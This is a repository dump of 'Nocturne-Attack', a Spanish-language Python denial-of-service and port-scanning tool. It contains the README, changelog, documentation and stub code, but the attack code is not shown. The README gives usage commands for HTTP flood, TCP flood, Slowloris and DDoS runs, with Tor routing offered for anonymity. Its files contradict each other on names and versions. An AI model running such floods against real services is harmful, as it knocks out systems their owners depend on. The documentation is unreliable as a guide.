├── requirements.txt ├── core.py ├── .gitgnore ├── cli.py ├── CONTRIBITING.md ├── LICENSE ├── .github └── workflows │ ├── python-package-conda.yml │ └── python-package.yml ├── CHANGELOG.md ├── SECURITY.md ├── README.md ├── .gitignore ├── DOCUMENTATION.txt ├── LANGUAGE.txt └── nocturne.py /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | stem 3 | urllib3 4 | -------------------------------------------------------------------------------- /core.py: -------------------------------------------------------------------------------- 1 | def run_from_cli(args): 2 | print("Nocturne ejecutándo.") 3 | -------------------------------------------------------------------------------- /.gitgnore: -------------------------------------------------------------------------------- 1 | __pycache__/ 2 | *.pyc 3 | .venv/ 4 | .env 5 | dist/ 6 | build/ 7 | *.egg-info/ 8 | -------------------------------------------------------------------------------- /cli.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | def main(): 3 | import argparse 4 | from .core import run_from_cli 5 | 6 | parser = argparse.ArgumentParser( 7 | prog="nocturne", 8 | description="Nocturne CLI (modo educativo)" 9 | ) 10 | # aquí subcomandos y opciones bueno, si es que sigo en este proyecto 11 | args = parser.parse_args() 12 | run_from_cli(args) 13 | -------------------------------------------------------------------------------- /CONTRIBITING.md: -------------------------------------------------------------------------------- 1 | 2 | --- 3 | 4 | ### 2) `pyproject.toml` 5 | ```toml 6 | [build-system] 7 | requires = ["setuptools>=61.0", "wheel"] 8 | build-backend = "setuptools.build_meta" 9 | 10 | [project] 11 | name = "nocturne" 12 | version = "0.1.0" 13 | description = "Nocturne" 14 | readme = "README.md" 15 | license = {text = "MIT"} 16 | authors = [{name="Rodrigo López", email="rodrigolopezpizarro271@gmail.com"}] 17 | dependencies = [ 18 | "requests>=2.28", 19 | "urllib3>=1.26", 20 | "stem>=1.8.0" 21 | ] 22 | 23 | [project.scripts] 24 | nocturne = "nocturne.cli:main" 25 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2023 Nocturne Project 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /.github/workflows/python-package-conda.yml: -------------------------------------------------------------------------------- 1 | name: Python Package using Conda 2 | 3 | on: [push] 4 | 5 | jobs: 6 | build-linux: 7 | runs-on: ubuntu-latest 8 | strategy: 9 | max-parallel: 5 10 | 11 | steps: 12 | - uses: actions/checkout@v4 13 | - name: Set up Python 3.10 14 | uses: actions/setup-python@v3 15 | with: 16 | python-version: '3.10' 17 | - name: Add conda to system path 18 | run: | 19 | # $CONDA is an environment variable pointing to the root of the miniconda directory 20 | echo $CONDA/bin >> $GITHUB_PATH 21 | - name: Install dependencies 22 | run: | 23 | conda env update --file environment.yml --name base 24 | - name: Lint with flake8 25 | run: | 26 | conda install flake8 27 | # stop the build if there are Python syntax errors or undefined names 28 | flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics 29 | # exit-zero treats all errors as warnings. The GitHub editor is 127 chars wide 30 | flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics 31 | - name: Test with pytest 32 | run: | 33 | conda install pytest 34 | pytest 35 | -------------------------------------------------------------------------------- /.github/workflows/python-package.yml: -------------------------------------------------------------------------------- 1 | # This workflow will install Python dependencies, run tests and lint with a variety of Python versions 2 | # For more information see: https://docs.github.com/en/actions/automating-builds-and-tests/building-and-testing-python 3 | 4 | name: Python package 5 | 6 | on: 7 | push: 8 | branches: [ "main" ] 9 | pull_request: 10 | branches: [ "main" ] 11 | 12 | jobs: 13 | build: 14 | 15 | runs-on: ubuntu-latest 16 | strategy: 17 | fail-fast: false 18 | matrix: 19 | python-version: ["3.9", "3.10", "3.11"] 20 | 21 | steps: 22 | - uses: actions/checkout@v4 23 | - name: Set up Python ${{ matrix.python-version }} 24 | uses: actions/setup-python@v3 25 | with: 26 | python-version: ${{ matrix.python-version }} 27 | - name: Install dependencies 28 | run: | 29 | python -m pip install --upgrade pip 30 | python -m pip install flake8 pytest 31 | if [ -f requirements.txt ]; then pip install -r requirements.txt; fi 32 | - name: Lint with flake8 33 | run: | 34 | # stop the build if there are Python syntax errors or undefined names 35 | flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics 36 | # exit-zero treats all errors as warnings. The GitHub editor is 127 chars wide 37 | flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics 38 | - name: Test with pytest 39 | run: | 40 | pytest 41 | -------------------------------------------------------------------------------- /CHANGELOG.md: -------------------------------------------------------------------------------- 1 | # Registro de Cambios 2 | 3 | Todos los cambios notables en este proyecto se documentarán en este archivo. 4 | 5 | El formato está basado en [Keep a Changelog](https://keepachangelog.com/es/1.0.0/), 6 | y este proyecto adhiere al [Versionado Semántico](https://semver.org/spec/v2.0.0.html). 7 | 8 | ## [1.0.0] - 2023-10-30 9 | 10 | ### Agregado 11 | - Sistema completo de internacionalización (i18n) con soporte para inglés y español 12 | - Menú de configuración interactivo 13 | - Soporte para Tor con rotación de identidad 14 | - Documentación completa del proyecto 15 | - Políticas de seguridad 16 | 17 | ### Cambiado 18 | - Refactorización completa del código para mejor mantenibilidad 19 | - Mejora en el manejo de errores 20 | - Optimización del rendimiento en ataques DDoS 21 | 22 | ### Corregido 23 | - Problema de cambio de idioma que no persistía 24 | - Errores menores en la interfaz de usuario 25 | - Problemas de estabilidad en conexiones de red 26 | 27 | ## [0.9.0] - 2023-10-15 28 | 29 | ### Agregado 30 | - Funcionalidad básica de escaneo de puertos 31 | - Ataque HTTP Flood 32 | - Ataque TCP Flood 33 | - Ataque Slowloris 34 | - Ataque DDoS básico 35 | 36 | ### Cambiado 37 | - Mejoras en la estructura del proyecto 38 | - Optimización de recursos 39 | 40 | ### Corregido 41 | - Problemas de concurrencia 42 | - Errores en el manejo de sockets 43 | 44 | --- 45 | 46 | ## Notas de Versión 47 | 48 | ### Convención de Versiones 49 | 50 | Dado un número de versión MAYOR.MENOR.PARCHE, se incrementa: 51 | 52 | 1. **MAYOR**: Cambios incompatibles con versiones anteriores 53 | 2. **MENOR**: Nuevas funcionalidades compatibles 54 | 3. **PARCHE**: Correcciones de errores compatibles 55 | 56 | ### Tipos de Cambios 57 | 58 | - **Agregado**: Nueva funcionalidad 59 | - **Cambiado**: Cambios en funcionalidad existente 60 | - **Obsoleto**: Próxima eliminación 61 | - **Eliminado**: Funcionalidad eliminada 62 | - **Corregido**: Corrección de errores 63 | - **Seguridad**: Vulnerabilidades corregidas 64 | 65 | --- 66 | 67 | ## Historial de Versiones 68 | 69 | - **1.0.0** - Versión estable con todas las características 70 | - **0.9.0** - Versión beta inicial 71 | 72 | ## Próximas Características 73 | 74 | - [ ] Soporte para más idiomas 75 | - [ ] Interfaz gráfica de usuario (GUI) 76 | - [ ] Más técnicas de ataque 77 | - [ ] Panel de estadísticas en tiempo real 78 | - [ ] API REST para integración con otras herramientas 79 | 80 | --- 81 | 82 | *Este archivo sigue el estándar [Keep a Changelog](https://keepachangelog.com/es/1.0.0/).* 83 | -------------------------------------------------------------------------------- /SECURITY.md: -------------------------------------------------------------------------------- 1 | # Política de Seguridad 2 | 3 | ## Reportando Vulnerabilidades 4 | 5 | Agradecemos a los investigadores de seguridad que ayudan a mantener segura a nuestra comunidad. Si ha descubierto una vulnerabilidad de seguridad en Nocturne, le agradecemos que nos lo notifique de manera responsable. 6 | 7 | ### Cómo Reportar 8 | 9 | Por favor, envíe un correo electrónico a rodrigolopezpizarro271@gmail.com con el asunto "VULNERABILIDAD: [breve descripción]" e incluya la siguiente información: 10 | 11 | - Descripción detallada de la vulnerabilidad 12 | - Pasos para reproducir la vulnerabilidad 13 | - Impacto potencial de la vulnerabilidad 14 | - Cualquier prueba de concepto o código de explotación 15 | - Su nombre y afiliación (si lo desea) 16 | 17 | ### Proceso de Reporte 18 | 19 | 1. Recibirá un acuse de recibo de su informe dentro de las 48 horas. 20 | 2. Investigaremos la vulnerabilidad y le mantendremos informado sobre nuestro progreso. 21 | 3. Una vez resuelta la vulnerabilidad, le notificaremos y le daremoscrédito (a menos que prefiera permanecer en el anonimato). 22 | 4. Publicaremos un aviso de seguridad junto con la solución en el siguiente lanzamiento de parches. 23 | 24 | ## Política de Divulgación Responsable 25 | 26 | Seguimos el principio de divulgación responsable, lo que significa que: 27 | 28 | - No tomaremos acciones legales contra investigadores que sigan esta política 29 | - No compartiremos su información personal sin su permiso 30 | - Trabajaremos contigo para entender y validar tu informe 31 | - Haremos todo lo posible para corregir la vulnerabilidad de manera oportuna 32 | 33 | ## Versiones Soportadas 34 | 35 | Solo se proporcionan actualizaciones de seguridad para la última versión principal del software. Se recomienda a los usuarios que siempre ejecuten la última versión estable. 36 | 37 | ## Recompensas 38 | 39 | Actualmente no ofrecemos un programa de recompensas por errores, pero estaremos encantados de reconocer su contribución en nuestras notas de lanzamiento y en la sección de agradecimientos. 40 | 41 | ## Mejores Prácticas de Seguridad 42 | 43 | ### Para Usuarios 44 | 45 | - Ejecute siempre la última versión del software 46 | - Utilice la herramienta solo en entornos autorizados 47 | - Revise regularmente los registros de seguridad 48 | - No exponga la herramienta a Internet a menos que sea absolutamente necesario 49 | 50 | ### Para Desarrolladores 51 | 52 | 1. Siga las mejores prácticas de codificación segura 53 | 2. Revise todo el código en busca de posibles problemas de seguridad 54 | 3. Mantenga actualizadas todas las dependencias 55 | 4. Utilice herramientas de análisis estático de código 56 | 57 | ## Historial de Seguridad 58 | 59 | Puede encontrar un registro de todas las vulnerabilidades corregidas en el archivo [CHANGELOG.md](CHANGELOG.md). 60 | 61 | ## Contacto de Seguridad 62 | 63 | Para cualquier consulta relacionada con la seguridad, contacte a: 64 | 65 | - **Equipo de Seguridad de Nocturne**: rodrigolopezpizarro271@gmail.com 66 | - **Clave PGP**: Todavia no 67 | 68 | ## Uso Ético 69 | 70 | Esta herramienta está diseñada únicamente para: 71 | - Pruebas de seguridad autorizadas 72 | - Evaluación de la seguridad de sus propios sistemas 73 | - Investigación académica 74 | - Propósitos educativos 75 | 76 | El uso malintencionado de esta herramienta es estrictamente prohibido y puede ser ilegal. 77 | 78 | --- 79 | 80 | *Última actualización: Octubre 2025* 81 | 82 | *© 2025 Nocturne Project. Todos los derechos reservados.* 83 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Nocturne-Attack Framework 2 | # Nocturne - Herramienta de Pruebas de Red 3 | 4 | [![Python 3.8+](https://img.shields.io/badge/Python-3.8%2B-blue.svg)](https://www.python.org/downloads/) 5 | [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT) 6 | 7 | Nocturne es una herramienta avanzada de pruebas de seguridad y pruebas de estrés que permite realizar diversas técnicas de evaluación de seguridad en redes y aplicaciones web. Desarrollada en Python, esta herramienta está diseñada para profesionales de seguridad informática, pentesters y entusiastas de la ciberseguridad. 8 | 9 | ## 🚀 Características Principales 10 | 11 | - **Escaneo de Puertos**: Escaneo eficiente de puertos abiertos en hosts remotos. 12 | - **Ataque HTTP Flood**: Simulación de múltiples peticiones HTTP para pruebas de carga. 13 | - **Ataque TCP Flood**: Pruebas de estrés a nivel de red TCP. 14 | - **Ataque Slowloris**: Técnica de denegación de servicio de capa de aplicación. 15 | - **Ataque DDoS**: Simulación de ataques distribuidos de denegación de servicio. 16 | - **Soporte Multilenguaje**: Interfaz disponible en múltiples idiomas. 17 | - **Uso de Tor**: Opción para enrutar el tráfico a través de la red Tor para mayor anonimato. 18 | 19 | ## 📦 Requisitos Previos 20 | 21 | - Python 3.8 o superior 22 | - pip (gestor de paquetes de Python) 23 | - Dependencias del sistema (instaladas automáticamente): 24 | - `requests` 25 | - `colorama` 26 | - `stem` (para soporte de Tor) 27 | 28 | ## 🛠 Instalación 29 | 30 | ### Método 1: Clonar el repositorio 31 | 32 | ```bash 33 | # Clonar el repositorio 34 | git clone https://github.com/nocturne-cibersecurity/Nocturne-Attack 35 | cd Nocturne-Attack 36 | 37 | # Instalar dependencias 38 | pip install -r requirements.txt 39 | 40 | # Si no se instalan las dependencias en kali linux 41 | sudo apt update 42 | sudo apt install -y python3-requests python3-urlib3 python3-stem 43 | ``` 44 | 45 | ### Método 2: Instalación directa 46 | 47 | ```bash 48 | pip install git+https://github.com/nocturne-cibersecurity/Nocturne-Attack 49 | ``` 50 | 51 | ## 🚀 Uso Básico 52 | 53 | ### Ejecutar en modo interactivo 54 | 55 | ```bash 56 | python main.py 57 | ``` 58 | 59 | ### Uso desde línea de comandos 60 | 61 | ```bash 62 | # Escaneo de puertos 63 | python main.py --scan --start-port --end-port 64 | 65 | # Ataque HTTP Flood 66 | python main.py --http-flood --requests --delay 67 | 68 | # Ataque TCP Flood 69 | python main.py --tcp-flood --port --connections 70 | 71 | # Ataque Slowloris 72 | python main.py --slowloris --sockets 73 | 74 | # Ataque DDoS 75 | python main.py --ddos --duration 76 | ``` 77 | 78 | ## 🌐 Configuración 79 | 80 | El archivo de configuración se guarda automáticamente en `~/.nocturne_config.json` y contiene las siguientes opciones: 81 | 82 | ```json 83 | { 84 | "LANGUAGE": "english", 85 | "EMOJIS": true, 86 | "MAX_WORKERS": 200, 87 | "USE_TOR": true, 88 | "TOR_ROTATION_INTERVAL": 30 89 | } 90 | ``` 91 | 92 | ### Cambiar idioma 93 | 94 | Puedes cambiar el idioma desde el menú de configuración (opción 6) o modificando directamente el archivo de configuración. 95 | 96 | ### Usar Tor 97 | 98 | Para habilitar/deshabilitar el uso de Tor: 99 | 1. Ve al menú de configuración (opción 6) 100 | 2. Selecciona la opción para alternar el uso de Tor 101 | 102 | ## 📝 Ejemplos de Uso 103 | 104 | ### Ejemplo 1: Escaneo de Puertos 105 | 106 | ```bash 107 | # Escanear puertos 1-1000 en example.com 108 | python main.py --scan example.com --start-port 1 --end-port 1000 109 | ``` 110 | 111 | ### Ejemplo 2: Prueba de Carga HTTP 112 | 113 | ```bash 114 | # Enviar 1000 peticiones a un sitio web con 0.1s de retraso 115 | python main.py --http-flood http://example.com --requests 1000 --delay 0.1 116 | ``` 117 | 118 | ### Ejemplo 3: Ataque TCP Flood 119 | 120 | ```bash 121 | # Establecer 500 conexiones TCP a un servidor 122 | python main.py --tcp-flood 192.168.1.1 --port 80 --connections 500 123 | ``` 124 | 125 | ## 🔒 Consideraciones de Seguridad 126 | 127 | ⚠️ **ADVERTENCIA**: Esta herramienta está diseñada únicamente para: 128 | - Pruebas de seguridad autorizadas 129 | - Evaluación de la seguridad de tus propios sistemas 130 | - Investigación académica 131 | 132 | ❌ **No utilices esta herramienta para actividades ilegales o no autorizadas ya que es realmente poderosa y podria causar daño real.** 133 | 134 | ## 📄 Licencia 135 | 136 | Este proyecto está bajo la licencia MIT. Consulta el archivo [LICENSE](LICENSE) para más detalles. 137 | 138 | ## 🤝 Contribuciones 139 | 140 | Las contribuciones son bienvenidas. Por favor, lee las [pautas de contribución](CONTRIBUTING.md) antes de enviar un pull request. 141 | 142 | ## 📧 Contacto 143 | 144 | Si tienes preguntas o sugerencias, por favor abre un issue en el repositorio o contactame por gmail: rodrigolopezpizarro271@gmail.com 145 | 146 | --- 147 | 148 |
149 |

Hecho con ❤️ para la comunidad de seguridad informática

150 |

© 2025 Nocturne Project | Versión 1.1.6

151 |
152 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[codz] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | share/python-wheels/ 24 | *.egg-info/ 25 | .installed.cfg 26 | *.egg 27 | MANIFEST 28 | 29 | # PyInstaller 30 | # Usually these files are written by a python script from a template 31 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 32 | *.manifest 33 | *.spec 34 | 35 | # Installer logs 36 | pip-log.txt 37 | pip-delete-this-directory.txt 38 | 39 | # Unit test / coverage reports 40 | htmlcov/ 41 | .tox/ 42 | .nox/ 43 | .coverage 44 | .coverage.* 45 | .cache 46 | nosetests.xml 47 | coverage.xml 48 | *.cover 49 | *.py.cover 50 | .hypothesis/ 51 | .pytest_cache/ 52 | cover/ 53 | 54 | # Translations 55 | *.mo 56 | *.pot 57 | 58 | # Django stuff: 59 | *.log 60 | local_settings.py 61 | db.sqlite3 62 | db.sqlite3-journal 63 | 64 | # Flask stuff: 65 | instance/ 66 | .webassets-cache 67 | 68 | # Scrapy stuff: 69 | .scrapy 70 | 71 | # Sphinx documentation 72 | docs/_build/ 73 | 74 | # PyBuilder 75 | .pybuilder/ 76 | target/ 77 | 78 | # Jupyter Notebook 79 | .ipynb_checkpoints 80 | 81 | # IPython 82 | profile_default/ 83 | ipython_config.py 84 | 85 | # pyenv 86 | # For a library or package, you might want to ignore these files since the code is 87 | # intended to run in multiple environments; otherwise, check them in: 88 | # .python-version 89 | 90 | # pipenv 91 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 92 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 93 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 94 | # install all needed dependencies. 95 | #Pipfile.lock 96 | 97 | # UV 98 | # Similar to Pipfile.lock, it is generally recommended to include uv.lock in version control. 99 | # This is especially recommended for binary packages to ensure reproducibility, and is more 100 | # commonly ignored for libraries. 101 | #uv.lock 102 | 103 | # poetry 104 | # Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control. 105 | # This is especially recommended for binary packages to ensure reproducibility, and is more 106 | # commonly ignored for libraries. 107 | # https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control 108 | #poetry.lock 109 | #poetry.toml 110 | 111 | # pdm 112 | # Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control. 113 | # pdm recommends including project-wide configuration in pdm.toml, but excluding .pdm-python. 114 | # https://pdm-project.org/en/latest/usage/project/#working-with-version-control 115 | #pdm.lock 116 | #pdm.toml 117 | .pdm-python 118 | .pdm-build/ 119 | 120 | # pixi 121 | # Similar to Pipfile.lock, it is generally recommended to include pixi.lock in version control. 122 | #pixi.lock 123 | # Pixi creates a virtual environment in the .pixi directory, just like venv module creates one 124 | # in the .venv directory. It is recommended not to include this directory in version control. 125 | .pixi 126 | 127 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm 128 | __pypackages__/ 129 | 130 | # Celery stuff 131 | celerybeat-schedule 132 | celerybeat.pid 133 | 134 | # SageMath parsed files 135 | *.sage.py 136 | 137 | # Environments 138 | .env 139 | .envrc 140 | .venv 141 | env/ 142 | venv/ 143 | ENV/ 144 | env.bak/ 145 | venv.bak/ 146 | 147 | # Spyder project settings 148 | .spyderproject 149 | .spyproject 150 | 151 | # Rope project settings 152 | .ropeproject 153 | 154 | # mkdocs documentation 155 | /site 156 | 157 | # mypy 158 | .mypy_cache/ 159 | .dmypy.json 160 | dmypy.json 161 | 162 | # Pyre type checker 163 | .pyre/ 164 | 165 | # pytype static type analyzer 166 | .pytype/ 167 | 168 | # Cython debug symbols 169 | cython_debug/ 170 | 171 | # PyCharm 172 | # JetBrains specific template is maintained in a separate JetBrains.gitignore that can 173 | # be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore 174 | # and can be added to the global gitignore or merged into this file. For a more nuclear 175 | # option (not recommended) you can uncomment the following to ignore the entire idea folder. 176 | #.idea/ 177 | 178 | # Abstra 179 | # Abstra is an AI-powered process automation framework. 180 | # Ignore directories containing user credentials, local state, and settings. 181 | # Learn more at https://abstra.io/docs 182 | .abstra/ 183 | 184 | # Visual Studio Code 185 | # Visual Studio Code specific template is maintained in a separate VisualStudioCode.gitignore 186 | # that can be found at https://github.com/github/gitignore/blob/main/Global/VisualStudioCode.gitignore 187 | # and can be added to the global gitignore or merged into this file. However, if you prefer, 188 | # you could uncomment the following to ignore the entire vscode folder 189 | # .vscode/ 190 | 191 | # Ruff stuff: 192 | .ruff_cache/ 193 | 194 | # PyPI configuration file 195 | .pypirc 196 | 197 | # Cursor 198 | # Cursor is an AI-powered code editor. `.cursorignore` specifies files/directories to 199 | # exclude from AI features like autocomplete and code analysis. Recommended for sensitive data 200 | # refer to https://docs.cursor.com/context/ignore-files 201 | .cursorignore 202 | .cursorindexingignore 203 | 204 | # Marimo 205 | marimo/_static/ 206 | marimo/_lsp/ 207 | __marimo__/ 208 | -------------------------------------------------------------------------------- /DOCUMENTATION.txt: -------------------------------------------------------------------------------- 1 | DOCUMENTACION - HERRAMIENTA DE PRUEBAS DE CARGA NOCTURNE 2 | DESCRIPCION GENERAL 3 | 4 | Nocturne es una herramienta profesional de pruebas de carga y seguridad diseñada para auditorias legitimas y testing de infraestructura. Desarrollada para equipos de seguridad y administradores de sistemas. 5 | 6 | Caracteristicas Principales: 7 | 8 | Interfaz multidioma (Espanol/Ingles) 9 | 10 | Multiples tecnicas de testing 11 | 12 | Interfaz profesional adaptable 13 | 14 | Enfoque en seguridad etica 15 | 16 | INDICE 17 | 18 | Requisitos del Sistema 19 | 20 | Instalacion 21 | 22 | Uso Basico 23 | 24 | Modulos Disponibles 25 | 26 | Ejemplos de Uso 27 | 28 | Parametros de Configuracion 29 | 30 | Consideraciones de Seguridad 31 | 32 | Solucion de Problemas 33 | 34 | REQUISITOS DEL SISTEMA 35 | 36 | Requisitos Minimos: 37 | 38 | Python 3.8 o superior 39 | 40 | 2 GB RAM 41 | 42 | 100 MB espacio libre 43 | 44 | Conexion a internet (para dependencias) 45 | 46 | Dependencias Python: 47 | pip install requests 48 | INSTALACION 49 | 50 | Metodo 1: Ejecucion Directa 51 | python nocturne_tool.py 52 | 53 | Metodo 2: Clonacion 54 | git clone https://github.com/tu-usuario/nocturne-tool.git 55 | cd nocturne-tool 56 | python nocturne_tool.py 57 | USO BASICO 58 | 59 | Flujo de Ejecucion Tipico: 60 | 61 | Seleccionar idioma (Espanol/Ingles) 62 | 63 | Ingresar objetivo (URL o IP) 64 | 65 | Seleccionar tipo de prueba 66 | 67 | Configurar parametros especificos 68 | 69 | Ejecutar y analizar resultados 70 | 71 | Ejemplo Rapido: 72 | Selecciona idioma: 2 (Espanol) 73 | Objetivo: mi-servidor.local 74 | Tipo de prueba: 1 (Escaneo de Puertos) 75 | Puerto inicial: 1 76 | Puerto final: 1000 77 | MODULOS DISPONIBLES 78 | 79 | ESCANEO DE PUERTOS 80 | Proposito: Identificar servicios activos en el objetivo. 81 | 82 | Parametros: 83 | 84 | Host: IP o dominio objetivo 85 | 86 | Puerto inicial: Rango inferior (default: 1) 87 | 88 | Puerto final: Rango superior (default: 1000) 89 | 90 | Salida Ejemplo: 91 | [ESCANEO] Escaneando puertos 1-1000 en 192.168.1.1 92 | [OK] Puerto 22 ABIERTO (ssh) 93 | [OK] Puerto 80 ABIERTO (http) 94 | [OK] Puerto 443 ABIERTO (https) 95 | [OBJETIVO] Escaneo completado. Puertos abiertos: 3 96 | 97 | HTTP FLOOD 98 | Proposito: Pruebas de carga en servicios web. 99 | 100 | Parametros: 101 | 102 | URL: Endpoint objetivo 103 | 104 | Numero de requests: Volumen de prueba 105 | 106 | Delay: Intervalo entre requests 107 | 108 | Metricas: 109 | 110 | Requests exitosos/fallidos 111 | 112 | Tiempo total de ejecucion 113 | 114 | Requests por segundo 115 | 116 | TCP FLOOD 117 | Proposito: Pruebas de conectividad y carga TCP. 118 | 119 | Parametros: 120 | 121 | IP objetivo: Direccion del servidor 122 | 123 | Puerto: Puerto TCP objetivo 124 | 125 | Conexiones: Numero de conexiones simultaneas 126 | 127 | Mensaje: Datos a enviar (opcional) 128 | 129 | SLOWLORIS ATTACK 130 | Proposito: Pruebas de resistencia a conexiones lentas. 131 | 132 | Caracteristicas: 133 | 134 | Conexiones HTTP parciales 135 | 136 | Mantenimiento de sockets abiertos 137 | 138 | Bajo ancho de banda requerido 139 | 140 | DDOS SIMULADO 141 | Proposito: Pruebas de resistencia multi-tecnica. 142 | 143 | Tecnicas incluidas: 144 | 145 | Multiples workers simultaneos 146 | 147 | Requests HTTP variados 148 | 149 | User-Agents rotativos 150 | 151 | PARAMETROS DE CONFIGURACION 152 | 153 | Configuracion Global (En codigo): 154 | 155 | class Config: 156 | LANGUAGE = "spanish" # "english" or "spanish" 157 | EMOJIS = False # True para interfaz visual 158 | MAX_WORKERS = 200 # Maximo de hilos concurrentes 159 | 160 | Limites Recomendados: 161 | 162 | PORT_SCAN_MAX_PORTS: 10000 163 | 164 | HTTP_FLOOD_MAX_REQUESTS: 10000 165 | 166 | TCP_FLOOD_MAX_CONNECTIONS: 500 167 | 168 | CONSIDERACIONES DE SEGURIDAD 169 | 170 | Uso Etico Requerido: 171 | 172 | SOLO usar en sistemas propios o con autorizacion explicita. 173 | No utilizar contra infraestructura ajena sin permiso. 174 | 175 | Objetivos Permitidos: 176 | 177 | localhost 178 | 179 | 127.0.0.1 180 | 181 | Redes locales (192.168.., 10...*) 182 | 183 | Dominios de propiedad propia 184 | 185 | Protecciones Implementadas: 186 | 187 | Timeouts en todas las operaciones 188 | 189 | Limites de recursos configurables 190 | 191 | Validacion de objetivos 192 | 193 | Manejo seguro de excepciones 194 | 195 | EJEMPLOS DE USO 196 | 197 | Caso 1: Auditoria de Servidor Web 198 | 199 | Escaneo de puertos 200 | Objetivo: mi-sitio.com 201 | Modulo: Escaneo de Puertos 202 | Puertos: 1-1000 203 | 204 | Prueba de carga HTTP 205 | Modulo: HTTP Flood 206 | Requests: 1000 207 | Delay: 0.1 208 | 209 | Caso 2: Testing de Firewall 210 | 211 | TCP Flood testing 212 | Objetivo: firewall.local 213 | Puerto: 80 214 | Conexiones: 100 215 | 216 | Slowloris testing 217 | Objetivo: sitio-web.com 218 | Sockets: 150 219 | 220 | Caso 3: Pruebas de Resiliencia 221 | 222 | DDoS simulado 223 | Objetivo: api.servicio.com 224 | Duracion: 120 segundos 225 | 226 | SOLUCION DE PROBLEMAS 227 | 228 | Error: "Connection refused" 229 | 230 | Verificar que el objetivo este activo 231 | 232 | Confirmar conectividad de red 233 | 234 | Verificar firewall 235 | 236 | Error: "Too many open files" 237 | 238 | Reducir MAX_WORKERS 239 | 240 | Limitar numero de conexiones 241 | 242 | Cerrar otras aplicaciones 243 | 244 | Rendimiento Lento: 245 | 246 | Aumentar MAX_WORKERS 247 | 248 | Reducir timeouts 249 | 250 | Verificar recursos del sistema 251 | 252 | Problemas de DNS: 253 | 254 | Usar IP en lugar de hostname 255 | 256 | Verificar configuracion DNS 257 | 258 | Probar con diferentes resolvers 259 | 260 | PREGUNTAS FRECUENTES 261 | 262 | P: ¿Es legal usar esta herramienta? 263 | R: Solo es legal en sistemas propios o con autorizacion explicita por escrito. 264 | 265 | P: ¿Puedo usar esto para testing de mi sitio web? 266 | R: Si, siempre que sea tu propiedad o tengas permiso del propietario. 267 | 268 | P: ¿Que diferencia hay entre los modos de idioma? 269 | R: Solo cambia el idioma de la interfaz, la funcionalidad es identica. 270 | 271 | P: ¿Como puedo contribuir al proyecto? 272 | R: Reportando bugs, sugiriendo mejoras o desarrollando nuevos modulos. 273 | LICENCIA Y USO 274 | 275 | Esta herramienta se proporciona solo con fines educativos y de testing autorizado. 276 | El usuario es responsable del uso que le de a la herramienta. 277 | Siempre obtener autorizacion explicita antes de realizar cualquier prueba. 278 | CONTACTO Y SOPORTE 279 | 280 | Para reportar problemas o sugerir mejoras: 281 | 282 | GitHub: github.com/tu-usuario/nocturne-tool 283 | 284 | Email: seguridad@tu-dominio.com 285 | 286 | Documentacion version: 1.0 287 | Ultima actualizacion: 2024 288 | Herramienta desarrollada por @Nocturne 289 | -------------------------------------------------------------------------------- /LANGUAGE.txt: -------------------------------------------------------------------------------- 1 | "spanish": { 2 | "banner": "HERRAMIENTA DE PRUEBAS DDOS, DOS, HTTP, TCP, SLOWLORIS, PORT SCANNER", 3 | "warning": "ADVERTENCIA: Usa solo en sistemas con autorización explícita", 4 | "warning_legal": "El mal uso de esta herramienta puede ser ilegal", 5 | "enter_target": "Ingresa URL o IP del objetivo", 6 | "select_attack": "SELECCIONA EL TIPO DE ATAQUE", 7 | "port_scan": "Escaneo de Puertos", 8 | "http_flood": "HTTP Flood", 9 | "tcp_flood": "TCP Flood", 10 | "slowloris": "Slowloris Attack", 11 | "ddos_sim": "DDoS", 12 | "option": "Opción (1-5)", 13 | "start_port": "Puerto inicial (default 1)", 14 | "end_port": "Puerto final (default 1000)", 15 | "num_requests": "Número de requests", 16 | "delay": "Delay entre requests (default 0.1)", 17 | "target_port": "Puerto objetivo", 18 | "num_connections": "Número de conexiones", 19 | 